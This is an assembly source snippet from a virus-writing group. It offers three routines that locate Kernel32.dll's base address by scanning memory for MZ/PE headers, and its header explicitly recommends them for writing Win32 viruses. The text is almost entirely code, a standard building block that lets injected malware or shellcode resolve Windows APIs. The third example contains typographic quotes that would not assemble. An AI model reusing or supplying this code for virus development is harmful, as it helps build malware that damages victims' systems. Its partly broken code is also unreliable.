;---------------------------------------------------------------------------------- ; Retrieve Kernel32.dll Address ; ------------------------------- ; ; ;This is the example asm code to retrieve the Kernel32.dll address from the memory. ;It is useful when you code the Win32 virus, :p ; ; ;The code is simple and straighforward, so, it should be easy enough to follow ; ; ; ; ; ;Credit go to Lord Julus, Billy Belcebu. ;Thanks go to F-13 Labs ; ; ; Disclaimer ; ---------- ;THIS CODE IS MEANT FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR CANNOT BE HELD ;RESPONSIBLE FOR ANY DAMAGE CAUSED DUE TO USE, MISUSE OR INABILITY TO USE THE ;SAME ; ; ;Author : lclee_vx ;Group : F-13 Labs ;Web : http://f13.host.sk ;Email : lclee_vx@yahoo.com ; ; ; a. Example 1 ;------------------------------------- ;Input : esi = begin [esp] ;Output : esi = Kernel base ;------------------------------------- GetK32 proc push eax Step1: dec esi mov ax, [esi+3ch] ;ax=PE header offset test ax, 0f000h ; ax = 0000 xxxx xxxx xxxx ; AND ; f000h = 1111 0000 0000 0000 ; zero? = 0000 0000 0000 0000 ; ;so, value ax < 1000h (4096d byte / 1 page) ; jnz Step1 cmp esi, [esi+eax+34h] jnz Step1 pop eax ret GetK32 endp ----------------------------------------- b. Example2 ;---------------------------------------------------- ;Input : esi= begin [esp] ;Output : eax= kernel base ;---------------------------------------------------- Limit equ (50000h/1000h) .code GetK32: __1: cmp byte ptr [ebp+K32_Limit],00h jz WeFailed cmp word ptr [esi],"ZM" jz CheckPE __2: sub esi,1000h dec byte ptr [ebp+K32_Limit] jmp __1 CheckPE: mov edi,[esi+3Ch] add edi,esi cmp dword ptr [edi],"EP" jz WeGotK32 jmp __2 WeFailed: stc WeGotK32: xchg eax,esi ret K32_Limit dw limit ;------------------------------------------------------------- c. Example 3 ;------------------------------------- ;Input : esi= begin [esp] ;Output : eax= kernel base ;------------------------------------- GetK32 proc ScanK32: cmp word ptr [esi], “ZM” je K32Found sub esi, 1000h jmp ScanK32 K32Found: mov eax, esi ret GetK32 endp ;------------------------------------------------------